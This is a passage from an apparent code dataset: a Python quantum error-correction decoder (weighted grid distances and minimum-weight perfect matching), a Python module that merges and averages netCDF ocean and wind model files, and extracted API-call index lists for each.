(1, 2, 4), 'StepGrid: Unsupported distance algorithm' # if both indices virtual then zero weight if not (self._code.is_in_bounds(src_i) or self._code.is_in_bounds(tgt_i)): return 0 # find sum of weighted steps over matrix elements along path if algorithm == 1: distance = self._distance_1(src_i, tgt_i) elif algorithm == 2: distance = self._distance_2(src_i, tgt_i) else: distance = self._distance_4(src_i, tgt_i) return distance def _distance_1(self, src_i, tgt_i): """ Distance between syndrome indices as sum of site weights [down and across]. :param src_i: Source syndrome index. :type src_i: 2-tuple of int :param tgt_i: Target syndrome index. :type tgt_i: 2-tuple of int :return: Distance :rtype: float """ src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices (min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners # sum down src column + sum across tgt row return np.sum(self._grid[min_r:max_r, src_i[1]]) + np.sum(self._grid[tgt_i[0], min_c:max_c]) def _distance_2(self, src_i, tgt_i): """ Distance between syndrome indices taking the minimum of sums of site weights [down and across] and [across and down]. :param src_i: Source syndrome index. :type src_i: 2-tuple of int :param tgt_i: Target syndrome index. :type tgt_i: 2-tuple of int :return: Distance :rtype: float """ src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices (min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners # sum down src column + sum along tgt row distance1 = np.sum(self._grid[min_r:max_r, src_i[1]]) + np.sum(self._grid[tgt_i[0], min_c:max_c]) # sum along src row + sum down tgt column distance2 = np.sum(self._grid[src_i[0], min_c:max_c]) + np.sum(self._grid[min_r:max_r, tgt_i[1]]) return min(distance1, distance2) def _distance_4(self, src_i, tgt_i): """ Distance between syndrome indices taking the minimum of sums of site weights [down and across], [across and down], [half-way down, across, half-way down] and [half-way across, down, half-way across]. :param src_i: Source syndrome index. :type src_i: 2-tuple of int :param tgt_i: Target syndrome index. :type tgt_i: 2-tuple of int :return: Distance :rtype: float """ src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices (min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners # sum down src column + sum along tgt row distance1 = np.sum(self._grid[min_r:max_r, src_i[1]]) + np.sum(self._grid[tgt_i[0], min_c:max_c]) # sum along src row + sum down tgt column distance2 = np.sum(self._grid[src_i[0], min_c:max_c]) + np.sum(self._grid[min_r:max_r, tgt_i[1]]) # sum half-way down src column + sum along mid-point row + sum half-way down tgt column mid_r = (min_r + max_r) // 2 distance3 = (np.sum(self._grid[min_r:mid_r, src_i[1]]) + np.sum(self._grid[mid_r, min_c:max_c]) + np.sum(self._grid[mid_r:max_r, tgt_i[1]])) # sum half-way along src row + sum down mid-point column + sum half-way along tgt row mid_c = (min_c + max_c) // 2 distance4 = (np.sum(self._grid[src_i[0], min_c:mid_c]) + np.sum(self._grid[min_r:max_r, mid_c]) + np.sum(self._grid[tgt_i[0], mid_c:max_c])) return min(distance1, distance2, distance3, distance4) @functools.lru_cache() def mwpm(self, matched_indices, syndrome_indices, factor=3, initial=1, box_shape='t', distance_algorithm=4): """ Minimum-weight perfect matching of syndrome indices over a background of matched dual syndrome indices. Notes: * The background is set according to :meth:`set_background`. * A graph of the unmatched foreground indices is created, with appropriate virtual indices, and with edge weights given by :meth:`distance`. * A standard minimum-weight perfect matching is found in the graph. :param matched_indices: Matched pairs of background syndrome indices (dual to foreground). :type matched_indices: frozenset of 2-tuples of 2-tuple of int :param syndrome_indices: Unmatched foreground syndrome indices. :type syndrome_indices: frozenset of 2-tuple of int :param factor: Multiplication factor. (default=3) :type factor: int or float :param initial: Initial edge weight. (default=1) :type initial: int or float :param box_shape: Shape of background boxes. (default='t', 't'=tight, 'r'=rounded, 'f'=fitted, 'l'=loose) :type box_shape: str :param distance_algorithm: Distance algorithm. (default=4, 1=v+h, 2=min(v+h,h+v), 4=min(v+h,h+v,v+h+v,h+v+h) :type distance_algorithm: int :return: Minimum-weight perfect matching of foreground syndrome indices. :rtype: frozenset of 2-tuples of 2-tuple of int """ # set grid background self.set_background(matched_indices, factor=factor, initial=initial, box_shape=box_shape) # prepare graph graph = gt.SimpleGraph() # create lists of nodes and corresponding vnodes # NOTE: encapsulate indices in node objects that implement object reference equality since we may pass # multiple virtual plaquettes with the same index for matching. nodes, vnodes = [], [] for index in syndrome_indices: nodes.append(self._Node(index)) vnodes.append(self._Node(self._code.virtual_plaquette_index(index))) # add weighted edges to graph for a_node, b_node in itertools.chain( itertools.combinations(nodes, 2), # all nodes to all nodes itertools.combinations(vnodes, 2), # all vnodes to all vnodes zip(nodes, vnodes)): # each node to corresponding vnode # find weighted taxi-cab distance between a and b distance = self.distance(a_node.index, b_node.index, algorithm=distance_algorithm) # add edge with weight=distance graph.add_edge(a_node, b_node, distance) # find MWPM edges {(a, b), (c, d), ...} mates = gt.mwpm(graph) # convert to frozenset of sorted tuples {(a_index, b_index), ...}, removing matches if both indices virtual matches = frozenset(tuple(sorted((a.index, b.index))) for a, b in mates if self._code.is_in_bounds(a.index) or self._code.is_in_bounds(b.index)) return matches class _Node: # simple class to contain index and implement object reference equality for mwpm __slots__ = ('index',) def __init__(self, index): self.index = index
[ "qecsim.model.cli_description", "operator.index", "numpy.sum", "numpy.zeros", "numpy.errstate", "qecsim.graphtools.mwpm", "itertools.combinations", "qecsim.graphtools.SimpleGraph", "functools.lru_cache", "logging.getLogger" ]
[((182, 209), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (199, 209), False, 'import logging\n'), ((213, 273), 'qecsim.model.cli_description', 'cli_description', (['"""Converging MWPM ([factor] FLOAT >=0, ...)"""'], {}), "('Converging MWPM ([factor] FLOAT >=0, ...)')\n", (228, 273), False, 'from qecsim.model import Decoder, cli_description\n'), ((24189, 24210), 'functools.lru_cache', 'functools.lru_cache', ([], {}), '()\n', (24208, 24210), False, 'import functools\n'), ((6772, 6796), 'numpy.errstate', 'np.errstate', ([], {'all': '"""raise"""'}), "(all='raise')\n", (6783, 6796), True, 'import numpy as np\n'), ((9368, 9431), 'numpy.zeros', 'np.zeros', (['(code.bounds[0] + 3, code.bounds[1] + 3)'], {'dtype': 'float'}), '((code.bounds[0] + 3, code.bounds[1] + 3), dtype=float)\n', (9376, 9431), True, 'import numpy as np\n'), ((25981, 25997), 'qecsim.graphtools.SimpleGraph', 'gt.SimpleGraph', ([], {}), '()\n', (25995, 25997), True, 'from qecsim import graphtools as gt\n'), ((27136, 27150), 'qecsim.graphtools.mwpm', 'gt.mwpm', (['graph'], {}), '(graph)\n', (27143, 27150), True, 'from qecsim import graphtools as gt\n'), ((21291, 21332), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, src_i[1]]'], {}), '(self._grid[min_r:max_r, src_i[1]])\n', (21297, 21332), True, 'import numpy as np\n'), ((21335, 21376), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], min_c:max_c]'], {}), '(self._grid[tgt_i[0], min_c:max_c])\n', (21341, 21376), True, 'import numpy as np\n'), ((22088, 22129), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, src_i[1]]'], {}), '(self._grid[min_r:max_r, src_i[1]])\n', (22094, 22129), True, 'import numpy as np\n'), ((22132, 22173), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], min_c:max_c]'], {}), '(self._grid[tgt_i[0], min_c:max_c])\n', (22138, 22173), True, 'import numpy as np\n'), ((22252, 22293), 'numpy.sum', 'np.sum', (['self._grid[src_i[0], min_c:max_c]'], {}), '(self._grid[src_i[0], min_c:max_c])\n', (22258, 22293), True, 'import numpy as np\n'), ((22296, 22337), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, tgt_i[1]]'], {}), '(self._grid[min_r:max_r, tgt_i[1]])\n', (22302, 22337), True, 'import numpy as np\n'), ((23176, 23217), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, src_i[1]]'], {}), '(self._grid[min_r:max_r, src_i[1]])\n', (23182, 23217), True, 'import numpy as np\n'), ((23220, 23261), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], min_c:max_c]'], {}), '(self._grid[tgt_i[0], min_c:max_c])\n', (23226, 23261), True, 'import numpy as np\n'), ((23340, 23381), 'numpy.sum', 'np.sum', (['self._grid[src_i[0], min_c:max_c]'], {}), '(self._grid[src_i[0], min_c:max_c])\n', (23346, 23381), True, 'import numpy as np\n'), ((23384, 23425), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, tgt_i[1]]'], {}), '(self._grid[min_r:max_r, tgt_i[1]])\n', (23390, 23425), True, 'import numpy as np\n'), ((23727, 23768), 'numpy.sum', 'np.sum', (['self._grid[mid_r:max_r, tgt_i[1]]'], {}), '(self._grid[mid_r:max_r, tgt_i[1]])\n', (23733, 23768), True, 'import numpy as np\n'), ((24069, 24110), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], mid_c:max_c]'], {}), '(self._grid[tgt_i[0], mid_c:max_c])\n', (24075, 24110), True, 'import numpy as np\n'), ((26574, 26606), 'itertools.combinations', 'itertools.combinations', (['nodes', '(2)'], {}), '(nodes, 2)\n', (26596, 26606), False, 'import itertools\n'), ((26654, 26687), 'itertools.combinations', 'itertools.combinations', (['vnodes', '(2)'], {}), '(vnodes, 2)\n', (26676, 26687), False, 'import itertools\n'), ((4784, 4814), 'operator.index', 'operator.index', (['max_iterations'], {}), '(max_iterations)\n', (4798, 4814), False, 'import operator\n'), ((23592, 23633), 'numpy.sum', 'np.sum', (['self._grid[min_r:mid_r, src_i[1]]'], {}), '(self._grid[min_r:mid_r, src_i[1]])\n', (23598, 23633), True, 'import numpy as np\n'), ((23661, 23699), 'numpy.sum', 'np.sum', (['self._grid[mid_r, min_c:max_c]'], {}), '(self._grid[mid_r, min_c:max_c])\n', (23667, 23699), True, 'import numpy as np\n'), ((23934, 23975), 'numpy.sum', 'np.sum', (['self._grid[src_i[0], min_c:mid_c]'], {}), '(self._grid[src_i[0], min_c:mid_c])\n', (23940, 23975), True, 'import numpy as np\n'), ((24003, 24041), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, mid_c]'], {}), '(self._grid[min_r:max_r, mid_c])\n', (24009, 24041), True, 'import numpy as np\n')]
from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file from modeldata import Dimension from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range from utilities import get_variable_name, get_variable_name_reverse import log from netCDF4 import Dataset from datetime import datetime import numpy as np import os def merge_netcdfs_in_folder_to_single_file(input_dir,output_path,variables=['u','v'],velocities=None,log_file=None): ncfiles = get_ncfiles_in_dir(input_dir) log.info(log_file,f'Loading data {input_dir}{ncfiles[0]}') modeldata = from_local_file(input_dir+ncfiles[0],variables=variables) for ncfile in ncfiles[1:]: netcdf = Dataset(input_dir+ncfile) for variable_name in variables: log.info(log_file,f'Appending {variable_name} data from {input_dir+ncfile}') modeldata.append_to_variable(variable_name,netcdf[variable_name][:].filled(fill_value=np.nan)) log.info(log_file,f'Appending time data from {input_dir+ncfile}') modeldata.append_to_time(netcdf['time'][:].filled(fill_value=np.nan)) netcdf.close() if velocities == 'currents': log.info(log_file,f'Adding absolute current velocity') modeldata.add_absolute_current_velocity() elif velocities == 'wind': log.info(log_file,f'Adding absolute wind velocity') modeldata.add_absolute_wind_velocity() modeldata.write_to_netcdf(None,output_path=output_path) def merge_variables_into_netcdf(input_dirs,output_dir,timeformat='%Y%m',log_file='edt/merge_netcdfs.log'): main_input_dir = input_dirs[0] input_dirs = input_dirs[1:] nc_files = get_ncfiles_in_dir(main_input_dir) for nc_file in nc_files: log.info(log_file,f'Loading data {main_input_dir+nc_file}') modeldata = from_local_file(main_input_dir+nc_file) date0 = modeldata.time.datetime[0].date() for input_dir in input_dirs: nc_file_add = get_ncfiles_in_time_range(input_dir,date0,date0,timeformat=timeformat) if len(nc_file_add) == 0: continue if len(nc_file_add) > 1: raise ValueError(f'More than one netcdf file found in date range {date0.strftime(timeformat)}') netcdf = Dataset(input_dir+nc_file_add[0]) variable_names = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon'])) for variable_name in variable_names: log.info(log_file,f'Adding variable {variable_name} to netcdf') variable = netcdf_to_quantity(netcdf,variable_name) modeldata.fill_variable(variable_name,variable) netcdf.close() output_path = modeldata.get_output_path(output_dir,filename_format=timeformat) log.info(log_file,f'Saving merged netcdf to {output_path}') _ = modeldata.write_to_netcdf(output_dir,filename_format=timeformat) def get_monthly_means_from_local_daily_files(input_dir : str, output_dir : str, input_filenameformat = '%Y%m%d', output_filenameformat = '%Y%m', log_file='merge_daily_to_monthly.log'): ncfiles = get_ncfiles_in_dir(input_dir) for ncfile in ncfiles: ncfile_datestr,_ = os.path.splitext(ncfile) ncfile_datetime = datetime.strptime(ncfile_datestr,input_filenameformat) output_path = output_dir+ncfile_datetime.strftime(output_filenameformat)+'.nc' if os.path.exists(output_path): log.info(log_file,f'File already exists, skipping: {output_path}') continue log.info(log_file,f'Getting monthly means for {ncfile_datetime.month} {ncfile_datetime.year}') start_date = datetime(ncfile_datetime.year,ncfile_datetime.month,1) if ncfile_datetime.month < 12: end_date = datetime(ncfile_datetime.year,ncfile_datetime.month+1,1) ncfiles_merge = get_ncfiles_in_time_range(input_dir,start_date,end_date,including_end=0) else: end_date = datetime(ncfile_datetime.year,ncfile_datetime.month,31) ncfiles_merge = get_ncfiles_in_time_range(input_dir,start_date,end_date,including_end=1) log.info(log_file,f'Loading data from {input_dir+ncfiles_merge[0]}') modeldata = from_local_file(input_dir+ncfiles_merge[0]) for i in range(1,len(ncfiles_merge)): netcdf = Dataset(input_dir+ncfiles_merge[i]) variables = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon'])) for variable in variables: log.info(log_file,f'Appending data from {input_dir+ncfiles_merge[i]}') variable_values = netcdf[variable][:].filled(fill_value=np.nan) modeldata.append_to_variable(variable,variable_values) netcdf.close() log.info(log_file,f'Getting time mean values') modeldata.take_time_mean() modeldata.get_output_path(output_dir,filename_format=output_filenameformat) log.info(log_file,f'Writing to {output_path}') modeldata.write_to_netcdf(output_dir,filename_format=output_filenameformat) def get_total_mean_from_local_files(input_dir,output_path,i_depths=None,i_lats=None,i_lons=None, log_file='get_total_mean.log'): ncfiles = get_ncfiles_in_dir(input_dir) netcdf = Dataset(input_dir+ncfiles[0]) time = Dimension('time',np.array([0.0]),'days since 1900-01-01') depth = netcdf_to_dimension(netcdf,'depth',new_name='depth',i_use=i_depths) lon = netcdf_to_dimension(netcdf,'lon',new_name='lon',i_use=i_lons) lat = netcdf_to_dimension(netcdf,'lat',new_name='lat',i_use=i_lats) variables = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon'])) netcdf.close() modeldata = ModelData(time,depth,lat,lon) for variable in variables: n = 0 for ncfile in ncfiles: netcdf = Dataset(input_dir+ncfile) if n == 0: quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths) else: next_quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths) quantity.values = np.concatenate((quantity.values,next_quantity.values),axis=0) netcdf.close() next_quantity = None n += 1 quantity.values = np.nanmean(quantity.values,axis=0) modeldata.fill_variable(variable,quantity) modeldata.write_to_netcdf(None,output_path=output_path) def get_total_monthly_mean_from_local_files(input_dir : str, output_dir : str, filename_format = '%Y%m', log_file='get_total_monthly_mean.log', i_depths=None, i_lats=None, i_lons=None) -> ModelData: ncfiles = get_ncfiles_in_dir(input_dir) netcdf = Dataset(input_dir+ncfiles[0]) depth = netcdf_to_dimension(netcdf,'depth',new_name='depth',i_use=i_depths) lon = netcdf_to_dimension(netcdf,'lon',new_name='lon',i_use=i_lons) lat = netcdf_to_dimension(netcdf,'lat',new_name='lat',i_use=i_lats) variables = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon'])) netcdf.close() for month in np.arange(1,13): log.info(log_file, f'Getting total mean for month: {month}') output_path = f'{output_dir}climatology_{datetime(1900,month,1).strftime("%b").lower()}.nc' # initialise modeldata time = Dimension('time',np.array([(datetime(1900,month,1)-datetime(1900,1,1)).days]),'days since 1900-01-01') modeldata = ModelData(time,depth,lat,lon) for variable in variables: n = 0 for ncfile in ncfiles: ncfile_datestr,_ = os.path.splitext(ncfile) if datetime.strptime(ncfile_datestr,filename_format).month == month: netcdf = Dataset(input_dir+ncfile) if n == 0: quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths) else: next_quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths) quantity.values = np.concatenate((quantity.values,next_quantity.values),axis=0) netcdf.close() next_quantity = None n += 1 quantity.values = np.nanmean(quantity.values,axis=0) modeldata.fill_variable(variable,quantity) log.info(log_file, f'Writing to file: {output_path}') modeldata.write_to_netcdf(None, output_path=output_path)
[ "netCDF4.Dataset", "modeldata.netcdf_to_dimension", "utilities.get_ncfiles_in_dir", "modeldata.from_local_file", "os.path.exists", "utilities.get_ncfiles_in_time_range", "modeldata.netcdf_to_quantity", "datetime.datetime", "modeldata.ModelData", "log.info", "datetime.datetime.strptime", "numpy.arange", "os.path.splitext", "numpy.array", "numpy.concatenate", "numpy.nanmean" ]
[((496, 525), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (514, 525), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((530, 589), 'log.info', 'log.info', (['log_file', 'f"""Loading data {input_dir}{ncfiles[0]}"""'], {}), "(log_file, f'Loading data {input_dir}{ncfiles[0]}')\n", (538, 589), False, 'import log\n'), ((605, 665), 'modeldata.from_local_file', 'from_local_file', (['(input_dir + ncfiles[0])'], {'variables': 'variables'}), '(input_dir + ncfiles[0], variables=variables)\n', (620, 665), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((1694, 1728), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['main_input_dir'], {}), '(main_input_dir)\n', (1712, 1728), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((3298, 3327), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (3316, 3327), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((5442, 5471), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (5460, 5471), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((5485, 5516), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfiles[0])'], {}), '(input_dir + ncfiles[0])\n', (5492, 5516), False, 'from netCDF4 import Dataset\n'), ((5596, 5666), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""depth"""'], {'new_name': '"""depth"""', 'i_use': 'i_depths'}), "(netcdf, 'depth', new_name='depth', i_use=i_depths)\n", (5615, 5666), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((5674, 5738), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lon"""'], {'new_name': '"""lon"""', 'i_use': 'i_lons'}), "(netcdf, 'lon', new_name='lon', i_use=i_lons)\n", (5693, 5738), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((5746, 5810), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lat"""'], {'new_name': '"""lat"""', 'i_use': 'i_lats'}), "(netcdf, 'lat', new_name='lat', i_use=i_lats)\n", (5765, 5810), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((5928, 5960), 'modeldata.ModelData', 'ModelData', (['time', 'depth', 'lat', 'lon'], {}), '(time, depth, lat, lon)\n', (5937, 5960), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((6968, 6997), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (6986, 6997), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((7011, 7042), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfiles[0])'], {}), '(input_dir + ncfiles[0])\n', (7018, 7042), False, 'from netCDF4 import Dataset\n'), ((7053, 7123), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""depth"""'], {'new_name': '"""depth"""', 'i_use': 'i_depths'}), "(netcdf, 'depth', new_name='depth', i_use=i_depths)\n", (7072, 7123), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((7131, 7195), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lon"""'], {'new_name': '"""lon"""', 'i_use': 'i_lons'}), "(netcdf, 'lon', new_name='lon', i_use=i_lons)\n", (7150, 7195), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((7203, 7267), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lat"""'], {'new_name': '"""lat"""', 'i_use': 'i_lats'}), "(netcdf, 'lat', new_name='lat', i_use=i_lats)\n", (7222, 7267), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((7386, 7402), 'numpy.arange', 'np.arange', (['(1)', '(13)'], {}), '(1, 13)\n', (7395, 7402), True, 'import numpy as np\n'), ((711, 738), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfile)'], {}), '(input_dir + ncfile)\n', (718, 738), False, 'from netCDF4 import Dataset\n'), ((989, 1057), 'log.info', 'log.info', (['log_file', 'f"""Appending time data from {input_dir + ncfile}"""'], {}), "(log_file, f'Appending time data from {input_dir + ncfile}')\n", (997, 1057), False, 'import log\n'), ((1197, 1252), 'log.info', 'log.info', (['log_file', 'f"""Adding absolute current velocity"""'], {}), "(log_file, f'Adding absolute current velocity')\n", (1205, 1252), False, 'import log\n'), ((1766, 1828), 'log.info', 'log.info', (['log_file', 'f"""Loading data {main_input_dir + nc_file}"""'], {}), "(log_file, f'Loading data {main_input_dir + nc_file}')\n", (1774, 1828), False, 'import log\n'), ((1846, 1887), 'modeldata.from_local_file', 'from_local_file', (['(main_input_dir + nc_file)'], {}), '(main_input_dir + nc_file)\n', (1861, 1887), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((2826, 2886), 'log.info', 'log.info', (['log_file', 'f"""Saving merged netcdf to {output_path}"""'], {}), "(log_file, f'Saving merged netcdf to {output_path}')\n", (2834, 2886), False, 'import log\n'), ((3382, 3406), 'os.path.splitext', 'os.path.splitext', (['ncfile'], {}), '(ncfile)\n', (3398, 3406), False, 'import os\n'), ((3433, 3488), 'datetime.datetime.strptime', 'datetime.strptime', (['ncfile_datestr', 'input_filenameformat'], {}), '(ncfile_datestr, input_filenameformat)\n', (3450, 3488), False, 'from datetime import datetime\n'), ((3586, 3613), 'os.path.exists', 'os.path.exists', (['output_path'], {}), '(output_path)\n', (3600, 3613), False, 'import os\n'), ((3723, 3827), 'log.info', 'log.info', (['log_file', 'f"""Getting monthly means for {ncfile_datetime.month} {ncfile_datetime.year}"""'], {}), "(log_file,\n f'Getting monthly means for {ncfile_datetime.month} {ncfile_datetime.year}'\n )\n", (3731, 3827), False, 'import log\n'), ((3839, 3895), 'datetime.datetime', 'datetime', (['ncfile_datetime.year', 'ncfile_datetime.month', '(1)'], {}), '(ncfile_datetime.year, ncfile_datetime.month, 1)\n', (3847, 3895), False, 'from datetime import datetime\n'), ((4316, 4387), 'log.info', 'log.info', (['log_file', 'f"""Loading data from {input_dir + ncfiles_merge[0]}"""'], {}), "(log_file, f'Loading data from {input_dir + ncfiles_merge[0]}')\n", (4324, 4387), False, 'import log\n'), ((4405, 4450), 'modeldata.from_local_file', 'from_local_file', (['(input_dir + ncfiles_merge[0])'], {}), '(input_dir + ncfiles_merge[0])\n', (4420, 4450), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((4957, 5004), 'log.info', 'log.info', (['log_file', 'f"""Getting time mean values"""'], {}), "(log_file, f'Getting time mean values')\n", (4965, 5004), False, 'import log\n'), ((5131, 5178), 'log.info', 'log.info', (['log_file', 'f"""Writing to {output_path}"""'], {}), "(log_file, f'Writing to {output_path}')\n", (5139, 5178), False, 'import log\n'), ((5543, 5558), 'numpy.array', 'np.array', (['[0.0]'], {}), '([0.0])\n', (5551, 5558), True, 'import numpy as np\n'), ((6526, 6561), 'numpy.nanmean', 'np.nanmean', (['quantity.values'], {'axis': '(0)'}), '(quantity.values, axis=0)\n', (6536, 6561), True, 'import numpy as np\n'), ((7411, 7471), 'log.info', 'log.info', (['log_file', 'f"""Getting total mean for month: {month}"""'], {}), "(log_file, f'Getting total mean for month: {month}')\n", (7419, 7471), False, 'import log\n'), ((7741, 7773), 'modeldata.ModelData', 'ModelData', (['time', 'depth', 'lat', 'lon'], {}), '(time, depth, lat, lon)\n', (7750, 7773), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((8670, 8723), 'log.info', 'log.info', (['log_file', 'f"""Writing to file: {output_path}"""'], {}), "(log_file, f'Writing to file: {output_path}')\n", (8678, 8723), False, 'import log\n'), ((797, 876), 'log.info', 'log.info', (['log_file', 'f"""Appending {variable_name} data from {input_dir + ncfile}"""'], {}), "(log_file, f'Appending {variable_name} data from {input_dir + ncfile}')\n", (805, 876), False, 'import log\n'), ((1341, 1393), 'log.info', 'log.info', (['log_file', 'f"""Adding absolute wind velocity"""'], {}), "(log_file, f'Adding absolute wind velocity')\n", (1349, 1393), False, 'import log\n'), ((1999, 2072), 'utilities.get_ncfiles_in_time_range', 'get_ncfiles_in_time_range', (['input_dir', 'date0', 'date0'], {'timeformat': 'timeformat'}), '(input_dir, date0, date0, timeformat=timeformat)\n', (2024, 2072), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((2303, 2338), 'netCDF4.Dataset', 'Dataset', (['(input_dir + nc_file_add[0])'], {}), '(input_dir + nc_file_add[0])\n', (2310, 2338), False, 'from netCDF4 import Dataset\n'), ((3627, 3694), 'log.info', 'log.info', (['log_file', 'f"""File already exists, skipping: {output_path}"""'], {}), "(log_file, f'File already exists, skipping: {output_path}')\n", (3635, 3694), False, 'import log\n'), ((3956, 4016), 'datetime.datetime', 'datetime', (['ncfile_datetime.year', '(ncfile_datetime.month + 1)', '(1)'], {}), '(ncfile_datetime.year, ncfile_datetime.month + 1, 1)\n', (3964, 4016), False, 'from datetime import datetime\n'), ((4041, 4116), 'utilities.get_ncfiles_in_time_range', 'get_ncfiles_in_time_range', (['input_dir', 'start_date', 'end_date'], {'including_end': '(0)'}), '(input_dir, start_date, end_date, including_end=0)\n', (4066, 4116), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((4151, 4208), 'datetime.datetime', 'datetime', (['ncfile_datetime.year', 'ncfile_datetime.month', '(31)'], {}), '(ncfile_datetime.year, ncfile_datetime.month, 31)\n', (4159, 4208), False, 'from datetime import datetime\n'), ((4235, 4310), 'utilities.get_ncfiles_in_time_range', 'get_ncfiles_in_time_range', (['input_dir', 'start_date', 'end_date'], {'including_end': '(1)'}), '(input_dir, start_date, end_date, including_end=1)\n', (4260, 4310), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((4516, 4553), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfiles_merge[i])'], {}), '(input_dir + ncfiles_merge[i])\n', (4523, 4553), False, 'from netCDF4 import Dataset\n'), ((6055, 6082), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfile)'], {}), '(input_dir + ncfile)\n', (6062, 6082), False, 'from netCDF4 import Dataset\n'), ((8572, 8607), 'numpy.nanmean', 'np.nanmean', (['quantity.values'], {'axis': '(0)'}), '(quantity.values, axis=0)\n', (8582, 8607), True, 'import numpy as np\n'), ((2508, 2572), 'log.info', 'log.info', (['log_file', 'f"""Adding variable {variable_name} to netcdf"""'], {}), "(log_file, f'Adding variable {variable_name} to netcdf')\n", (2516, 2572), False, 'import log\n'), ((2599, 2640), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable_name'], {}), '(netcdf, variable_name)\n', (2617, 2640), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((4700, 4773), 'log.info', 'log.info', (['log_file', 'f"""Appending data from {input_dir + ncfiles_merge[i]}"""'], {}), "(log_file, f'Appending data from {input_dir + ncfiles_merge[i]}')\n", (4708, 4773), False, 'import log\n'), ((6131, 6205), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (6149, 6205), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((6253, 6327), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (6271, 6327), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((6359, 6422), 'numpy.concatenate', 'np.concatenate', (['(quantity.values, next_quantity.values)'], {'axis': '(0)'}), '((quantity.values, next_quantity.values), axis=0)\n', (6373, 6422), True, 'import numpy as np\n'), ((7894, 